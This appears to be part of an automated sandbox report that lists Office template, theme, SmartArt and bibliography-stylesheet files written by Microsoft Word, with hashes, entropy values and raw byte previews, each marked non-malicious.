                                                      Preview:PK.........]w>....<...5.......diagrams/layout1.xmlz........].r.F.}......1w`.J..'.......w..Dn. d....~........pw...O.......s...?...p7.t>e.r<.]u.e..d..|8..\uo.......K...._.Y..E6.|..y;........y.*/:o./...:[.o.+/.....?.....Z.?..s..d}...S.`...b.^o9.e.ty9_d...y>M.....7...e....."....<.v.u...e:].N.t....a....0..}..bQ.Y..>.~..~...U.|..Ev.....N...bw....{...O..Y.Y.&........A.8Ik...N.Z.P.[}t........|m...E..v..,..6........_?..."..K<.=x....$..%@.e..%....$=F..G..e........<F..G51..;......=...e.e.q..d......A...&9'.N.\%.=N.Z.9.s......y.4.Q.c......|8.......Eg.:.ky.z.h.......).O...mz...N.wy.m...yv....~8.?Lg..o.l.y:.....z.i..j.irxI.w...r.......|.=....s};.\u.{t;i~S.......U7..mw...<.vO...M.o...W.U.....}.`V<|..%....l..`>]..".].I.i.N..Z..~Lt.........}?..E~:..>$......x...%.........N....'C.m.=...w.=.Y...+'M.].2 >.]_~...'.?...:....z.O..Y......6..5...sj?.....).B..>.3...G...p.9.K!..[H..1$v../...E V..?`....+[...C......h..!.QI5....<.>...A.d.......
                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):254
                                                      Entropy (8bit):3.4721586910685547
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:4DD225E2A305B50AF39084CE568B8110
                                                      SHA1:C85173D49FC1522121AA2B0B2E98ADF4BB95B897
                                                      SHA-256:6F00DD73F169C73D425CB9895DAC12387E21C6E4C9C7DDCFB03AC32552E577F4
                                                      SHA-512:0493AB431004191381FF84AD7CC46BD09A1E0FEEC16B3183089AA8C20CC7E491FAE86FE0668A9AC677F435A203E494F5E6E9E4A0571962F6021D6156B288B28A
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .c.h.e.v.r.o.n.a.c.c.e.n.t...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........
                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                      File Type:Microsoft OOXML
                                                      Category:dropped
                                                      Size (bytes):4243
                                                      Entropy (8bit):7.824383764848892
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:7BC0A35807CD69C37A949BBD51880FF5
                                                      SHA1:B5870846F44CAD890C6EFF2F272A037DA016F0D8
                                                      SHA-256:BD3A013F50EBF162AAC4CED11928101554C511BD40C2488CF9F5842A375B50CA
                                                      SHA-512:B5B785D693216E38B5AB3F401F414CADACCDCB0DCA4318D88FE1763CD3BAB8B7670F010765296613E8D3363E47092B89357B4F1E3242F156750BE86F5F7E9B8D
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:PK........NnB;.h......F.......[Content_Types].xmlz.........MN.0...by.b.,.BI...X `...{..O.S...H\.'.XTP..K{.o.....rg..bL...XM.:.v..c.k...}.D....9.....Bb>.+..G.......+(.u}.w.]...v..{.M&.].>`....nB..B0Z@.e.u..R.......-.&#....aR..`.a..|. 1^......&..|..s.A.t..b..A.i7...7.&....bQK$O.......9....V....Wt_PK........TnB;..d.....h......._rels/.rels...J.0.._%.n..)"....<.w.&.4..!...y.|.........|.&3.o.....S..K.T5g.U....g..n.f....T*.hcf...D.V..Ft....d....c2".z.....N.s._2....7.0.V.]P.CO?...`...8....4&......_i..Y.T...Z...g....{-...]..pH..@.8....}tP.)..B>..A...S&......9..@...7........b_.PK........r};5.z..............diagrams/layout1.xml.X.n.8.}.........4.+.(...@......(..J..._.!)..b..v.}.H..zf8...dhM....E..I.H..V.Y.R..2zw5L~....^..]...J_..4.\.\......8..z..2T..".X.l.F#......5....,*....c....r.kR.I.E..,.2...&%..''.qF.R.2.....T;F...W.. ...3...AR.OR.O..J}.w6..<...,.x..x....`g?.t.I.{.I...|X..g.....<BR..^...Q.6..m.kp...ZuX.?.z.YO.g...$.......'.]..I.#...]$/~`${.
                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):286
                                                      Entropy (8bit):3.5502940710609354
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:9B8D7EFE8A69E41CDC2439C38FE59FAF
                                                      SHA1:034D46BEC5E38E20E56DD905E2CA2F25AF947ED1
                                                      SHA-256:70042F1285C3CD91DDE8D4A424A5948AE8F1551495D8AF4612D59709BEF69DF2
                                                      SHA-512:E50BB0C68A33D35F04C75F05AD4598834FEC7279140B1BB0847FF39D749591B8F2A0C94DA4897AAF6C33C50C1D583A836B0376015851910A77604F8396C7EF3C
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .i.s.o.6.9.0...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........
                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):270198
                                                      Entropy (8bit):5.073814698282113
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:FF0E07EFF1333CDF9FC2523D323DD654
                                                      SHA1:77A1AE0DD8DBC3FEE65DD6266F31E2A564D088A4
                                                      SHA-256:3F925E0CC1542F09DE1F99060899EAFB0042BB9682507C907173C392115A44B5
                                                      SHA-512:B4615F995FAB87661C2DBE46625AA982215D7BDE27CAFAE221DCA76087FE76DA4B4A381943436FCAC1577CB3D260D0050B32B7B93E3EB07912494429F126BB3D
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:<?xml version="1.0" encoding="utf-8"?>..<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..............<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$para
                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):333258
                                                      Entropy (8bit):4.654450340871081
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:5632C4A81D2193986ACD29EADF1A2177
                                                      SHA1:E8FF4FDFEB0002786FCE1CF8F3D25F8E9631E346
                                                      SHA-256:06DE709513D7976690B3DD8F5FDF1E59CF456A2DFBA952B97EACC72FE47B238B
                                                      SHA-512:676CE1957A374E0F36634AA9CFFBCFB1E1BEFE1B31EE876483B10763EA9B2D703F2F3782B642A5D7D0945C5149B572751EBD9ABB47982864834EF61E3427C796
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:<?xml version="1.0" encoding="utf-8"?>....<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">.. <xsl:output method="html" encoding="us-ascii"/>.... <xsl:template match="*" mode="outputHtml2">.. <xsl:apply-templates mode="outputHtml"/>.. </xsl:template>.... <xsl:template name="StringFormatDot">.. <xsl:param name="format" />.. <xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.. <xsl:when test="$format = ''"></xsl:when>.. <xsl:when test="substring($format, 1, 2) = '%%'">.. <xsl:text>%</xsl:text>.. <xsl:call-template name="StringFormatDot">.. <xsl:with-param name="format" select="substring($format, 3)" />.. <xsl:with-param name=
                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):328
                                                      Entropy (8bit):3.541819892045459
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:C3216C3FC73A4B3FFFE7ED67153AB7B5
                                                      SHA1:F20E4D33BABE978BE6A6925964C57D6E6EF1A92E
                                                      SHA-256:7CF1D6A4F0BE5E6184F59BFB1304509F38E480B59A3B091DBDC43B052D2137CB
                                                      SHA-512:D3B78BE6E7633FF943F5E34063B5EFA4AF239CD49F437227FC7575F6CC65C497B7D6F6A979EA065065BEAF257CB368560B5462542692286052B5C7E5C01755BC
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .A.P.A.S.i.x.t.h.E.d.i.t.i.o.n.O.f.f.i.c.e.O.n.l.i.n.e...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........
                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):256
                                                      Entropy (8bit):3.4842773155694724
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:923D406B2170497AD4832F0AD3403168
                                                      SHA1:A77DA08C9CB909206CDE42FE1543B9FE96DF24FB
                                                      SHA-256:EBF9CF474B25DDFE0F6032BA910D5250CBA2F5EDF9CF7E4B3107EDB5C13B50BF
                                                      SHA-512:A4CD8C74A3F916CA6B15862FCA83F17F2B1324973CCBCC8B6D9A8AEE63B83A3CD880DC6821EEADFD882D74C7EF58FA586781DED44E00E8B2ABDD367B47CE45B7
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .C.o.n.v.e.r.g.i.n.g.T.e.x.t...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........
                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                      Category:dropped
                                                      Size (bytes):11380
                                                      Entropy (8bit):7.891971054886943
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:C9F9364C659E2F0C626AC0D0BB519062
                                                      SHA1:C4036C576074819309D03BB74C188BF902D1AE00
                                                      SHA-256:6FC428CA0DCFC27D351736EF16C94D1AB08DDA50CB047A054F37EC028DD08AA2
                                                      SHA-512:173A5E68E55163B081C5A8DA24AE46428E3FB326EBE17AE9588C7F7D7E5E5810BFCF08C23C3913D6BEC7369E06725F50387612F697AC6A444875C01A2C94D0FF
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:PK.........T.>................[Content_Types].xmlz.........=N.1...b.Eko(.B....(.Pp..=.u.?.....#q..ND.!$.J{.o....G..[Cv.....+.R.Nx..........0."u..S...$&.....Je..B..x......m......M^z....f....|...N..Q..z.!.- .2.9y.i.8j...........0.AE..p.s~@../jw.#8.I.#....4.~Cl.:#h..f.PU.s.~........(.)F..Y......^x..PK.........T.>...V....L......._rels/.rels...J.@.._e..]AD.....x....3.t..T.w.\ZpA<x......v..'....z.........Y..[...<..2.TT....Q$.!.=.....&C....b".F.q.7...X3...7.8.N.}.. ?..8...#..,.L.3.#e...wZpZ.]S..:....t.....{..6.7.|..,dH.e..K 7-}.~.v...5.......b..PK........q.~<.6..9 ...e......diagrams/layout1.xml..r.........{.]..u...xv7b.....HPd....t.q...b.i_a.'..P.f.3..F..1...U.u.*.2......?}..O..V.....yQ.Mf........w.....O....N.........t3;...e....j.^.o&.....w...../.w................e.................O..,./..6...8>^.^..........ru5...\.=>[M?......g..........w.N....i.........iy6.?........>.......>{yT...........x.........-...z5.L./.g......_.l.1.....#...|...pr.q
                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):264
                                                      Entropy (8bit):3.4866056878458096
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:6C489D45F3B56845E68BE07EA804C698
                                                      SHA1:C4C9012C0159770CB882870D4C92C307126CEC3F
                                                      SHA-256:3FE447260CDCDEE287B8D01CF5F9F53738BFD6AAEC9FB9787F2826F8DEF1CA45
                                                      SHA-512:D1355C48A09E7317773E4F1613C4613B7EA42D21F5A6692031D288D69D47B19E8F4D5A29AFD8B751B353FC7DE865EAE7CFE3F0BEC05F33DDF79526D64A29EB18
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .T.h.e.m.e.P.i.c.t.u.r.e.A.c.c.e.n.t...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........
                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                      Category:dropped
                                                      Size (bytes):6448
                                                      Entropy (8bit):7.897260397307811
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:42A840DC06727E42D42C352703EC72AA
                                                      SHA1:21AAAF517AFB76BF1AF4E06134786B1716241D29
                                                      SHA-256:02CCE7D526F844F70093AC41731D1A1E9B040905DCBA63BA8BFFC0DBD4D3A7A7
                                                      SHA-512:8886BFD240D070237317352DEB3D46C6B07E392EBD57730B1DED016BD8740E75B9965F7A3FCD43796864F32AAE0BE911AB1A670E9CCC70E0774F64B1BDA93488
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:PK.........k.>........'......diagrams/layout1.xmlz........].r.8.}.V.?p.n....g*5..JUn.....(SU......T.l.......X.d."m."..S....F..P.........-..<Y^..=..e.L....m>.pG.....M~...+\....u}o...".Yn}Y.".-r......0...'/........{........F.~.M8.d....(.....q.D.....4\.;.D,.\.)n.S....Z.cl.|<..7._.dk..7..E.......kS...d.....i.....noX...o.W#9..}.^..I0....G.......+.K.[i.O.|G..8=.;.8.8.8.8.....{..-..^.y..[.....`...0..f...Q<^~..*.l....{...pA.z.$.$R.../...E.(..Q.(V.E_ ......X]Q..Y9.......>...8......l..--.ug.......I.;..].u.b.3Lv:.d.%H..l<...V...$.M..A>...^M./.[..I....o~,.U. .$d\..?........O.;..^M..O...A.$Yx..|f.n...H.=.|!cG)dd%..(... ..Xe......2B."i...n....P.R..E?... Y.I6...7n..Xs..J..K..'..JaU..d..|.(y.a.....d......D.Dr...._.._..m..Yu..6.o.\......&.m....wy...4k?..~........f....0.. \...}iS.i..R....q-#_..g........{Z.u.V.r(....j.I...,R..f.=.n.[.'..L'd.n C.0.I.....RpaV........c.k..NR....)B^k...d.i...d0.E. ^..G.']....x.c.>'..p...y.ny.P.x6..%.J\.....De.B\.
                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):274
                                                      Entropy (8bit):3.438490642908344
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:0F98498818DC28E82597356E2650773C
                                                      SHA1:1995660972A978D17BC483FCB5EE6D15E7058046
                                                      SHA-256:4587CA0B2A60728FF0A5B8E87D35BF6C6FDF396747E13436EC856612AC1C6288
                                                      SHA-512:768562F20CFE15001902CCE23D712C7439721ECA6E48DDDCF8BFF4E7F12A3BC60B99C274CBADD0128EEA1231DB19808BAA878E825497F3860C381914C21B46FF
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .E.l.e.m.e.n.t. .d.e.s.i.g.n. .s.e.t...d.o.t.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.W.D. .D.o.c.u.m.e.n.t. .P.a.r.t.s.}.........
                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                      File Type:Microsoft Word 2007+
                                                      Category:dropped
                                                      Size (bytes):34415
                                                      Entropy (8bit):7.352974342178997
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:7CDFFC23FB85AD5737452762FA36AAA0
                                                      SHA1:CFBC97247959B3142AFD7B6858AD37B18AFB3237
                                                      SHA-256:68A8FBFBEE4C903E17C9421082E839144C205C559AFE61338CBDB3AF79F0D270
                                                      SHA-512:A0685FD251208B772436E9745DA2AA52BC26E275537688E3AB44589372D876C9ACE14B21F16EC4053C50EB4C8E11787E9B9D922E37249D2795C5B7986497033E
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:PK.........Y5B#.W ............[Content_Types].xml ...(...................................................................................................................................................................................................................................................................................................................................................................................................................................................`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c.....D....>.V...f-}..r9....=..Mn..U..5.(.....a...E..b....*..w.$...,O_fu."[P..WU=.;.....5..wdt..y1.......i.44-.r....;./.biG=.HK...........&o[B....z.7.o...&.......[.oL_7cuN..&e..ccAo...YW......8...Y>.&DVy...-&.*...Y.....4.u.., !po....9W....g..F...*+1....d,'...L.M[-~.Ey. ......[
                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                      File Type:Microsoft OOXML
                                                      Category:dropped
                                                      Size (bytes):570901
                                                      Entropy (8bit):7.674434888248144
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:D676DE8877ACEB43EF0ED570A2B30F0E
                                                      SHA1:6C8922697105CEC7894966C9C5553BEB64744717
                                                      SHA-256:DF012D101DE808F6CD872DFBB619B16732C23CF4ABC64149B6C3CE49E9EFDA01
                                                      SHA-512:F40BADA680EA5CA508947290BA73901D78DE79EAA10D01EAEF975B80612D60E75662BDA542E7F71C2BBA5CA9BA46ECAFE208FD6E40C1F929BB5E407B10E89FBD
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:PK..........1AE,.{E...#P......[Content_Types].xml..Mo.0.....Z..N7.=l......V0.-o..j?...H..sa......./UCb.'...r...w.i..e..<[....{2..U.m..N.{...r.....3.fj.o......2.*....;.L.6..&,D.Cld8...a.gZf.......r-v..><....~/......|Zk.......a.R&.d.(.$..6..}.:.....3......1..[.p.....?..+....R...y,.fod.....e...-.|..#..]j....n:...f...-J...i.^.:Y....T..........m^..~GNp../e}...N....a..5.d.8YcN..5.d.8Y...7..A..e...7Q."3...../.sL._...v...n..b..2].v....n.t....Z...Uk...j.&.Z....im|.r....B.....7DaBuN.... ...>..>..>..>..>..>..>.........V}-.....Q}#.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7FaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}..&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7EaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}3.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b.\}..)...A.......[..PK..........1A.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...K`2...70...........84P....
                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):282
                                                      Entropy (8bit):3.5459495297497368
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:76340C3F8A0BFCEDAB48B08C57D9B559
                                                      SHA1:E1A6672681AA6F6D525B1D17A15BF4F912C4A69B
                                                      SHA-256:78FE546321EDB34EBFA1C06F2B6ADE375F3B7C12552AB2A04892A26E121B3ECC
                                                      SHA-512:49099F040C099A0AED88E7F19338140A65472A0F95ED99DEB5FA87587E792A2D11081D59FD6A83B7EE68C164329806511E4F1B8D673BEC9074B4FF1C09E3435D
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .D.i.v.i.d.e.n.d...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....
                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                      File Type:Microsoft OOXML
                                                      Category:dropped
                                                      Size (bytes):523048
                                                      Entropy (8bit):7.715248170753013
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:C276F590BB846309A5E30ADC35C502AD
                                                      SHA1:CA6D9D6902475F0BE500B12B7204DD1864E7DD02
                                                      SHA-256:782996D93DEBD2AF9B91E7F529767A8CE84ACCC36CD62F24EBB5117228B98F58
                                                      SHA-512:B85165C769DFE037502E125A04CFACDA7F7CC36184B8D0A54C1F9773666FFCC43A1B13373093F97B380871571788D532DEEA352E8D418E12FD7AAD6ADB75A150
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:PK..........1AE,.{E...#P......[Content_Types].xml..Mo.0.....Z..N7.=l......V0.-o..j?...H..sa......./UCb.'...r...w.i..e..<[....{2..U.m..N.{...r.....3.fj.o......2.*....;.L.6..&,D.Cld8...a.gZf.......r-v..><....~/......|Zk.......a.R&.d.(.$..6..}.:.....3......1..[.p.....?..+....R...y,.fod.....e...-.|..#..]j....n:...f...-J...i.^.:Y....T..........m^..~GNp../e}...N....a..5.d.8YcN..5.d.8Y...7..A..e...7Q."3...../.sL._...v...n..b..2].v....n.t....Z...Uk...j.&.Z....im|.r....B.....7DaBuN.... ...>..>..>..>..>..>..>.........V}-.....Q}#.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7FaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}..&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7EaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}3.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b.\}..)...A.......[..PK..........1A.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...K`2...70...........84P....
                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):276
                                                      Entropy (8bit):3.5159096381406645
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:71CCB69AF8DD9821F463270FB8CBB285
                                                      SHA1:8FED3EB733A74B2A57D72961F0E4CF8BCA42C851
                                                      SHA-256:8E63D7ABA97DABF9C20D2FAC6EB1665A5D3FDEAB5FA29E4750566424AE6E40B4
                                                      SHA-512:E62FC5BEAEC98C5FDD010FABDAA8D69237D31CA9A1C73F168B1C3ED90B6A9B95E613DEAD50EB8A5B71A7422942F13D6B5A299EB2353542811F2EF9DA7C3A15DC
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .F.r.a.m.e...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....
                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                      File Type:Microsoft OOXML
                                                      Category:dropped
                                                      Size (bytes):558035
                                                      Entropy (8bit):7.696653383430889
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:3B5E44DDC6AE612E0346C58C2A5390E3
                                                      SHA1:23BCF3FCB61F80C91D2CFFD8221394B1CB359C87
                                                      SHA-256:9ED9AD4EB45E664800A4876101CBEE65C232EF478B6DE502A330D7C89C9AE8E2
                                                      SHA-512:2E63419F272C6E411CA81945E85E08A6E3230A2F601C4D28D6312DB5C31321F94FAFA768B16BC377AE37B154C6869CA387005693A79C5AB1AC45ED73BCCC6479
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:PK..........1AE,.{E...#P......[Content_Types].xml..Mo.0.....Z..N7.=l......V0.-o..j?...H..sa......./UCb.'...r...w.i..e..<[....{2..U.m..N.{...r.....3.fj.o......2.*....;.L.6..&,D.Cld8...a.gZf.......r-v..><....~/......|Zk.......a.R&.d.(.$..6..}.:.....3......1..[.p.....?..+....R...y,.fod.....e...-.|..#..]j....n:...f...-J...i.^.:Y....T..........m^..~GNp../e}...N....a..5.d.8YcN..5.d.8Y...7..A..e...7Q."3...../.sL._...v...n..b..2].v....n.t....Z...Uk...j.&.Z....im|.r....B.....7DaBuN.... ...>..>..>..>..>..>..>.........V}-.....Q}#.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7FaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}..&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7EaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}3.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b.\}..)...A.......[..PK..........1A.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...K`2...70...........84P....
                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):276
                                                      Entropy (8bit):3.5361139545278144
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:133D126F0DE2CC4B29ECE38194983265
                                                      SHA1:D8D701298D7949BE6235493925026ED405290D43
                                                      SHA-256:08485EBF168364D846C6FD55CD9089FE2090D1EE9D1A27C1812E1247B9005E68
                                                      SHA-512:75D7322BE8A5EF05CAA48B754036A7A6C56399F17B1401F3F501DA5F32B60C1519F2981043A773A31458C3D9E1EF230EC60C9A60CAC6D52FFE16147E2E0A9830
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .B.a.s.i.s...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....
                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                      File Type:Microsoft OOXML
                                                      Category:dropped
                                                      Size (bytes):562113
                                                      Entropy (8bit):7.67409707491542
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:4A1657A3872F9A77EC257F41B8F56B3D
                                                      SHA1:4DDEA85C649A2C1408B5B08A15DEF49BAA608A0B
                                                      SHA-256:C17103ADE455094E17AC182AD4B4B6A8C942FD3ACB381F9A5E34E3F8B416AE60
                                                      SHA-512:7A2932639E06D79A5CE1D3C71091890D9E329CA60251E16AE4095E4A06C6428B4F86B7FFFA097BF3EEFA064370A4D51CA3DF8C89EAFA3B1F45384759DEC72922
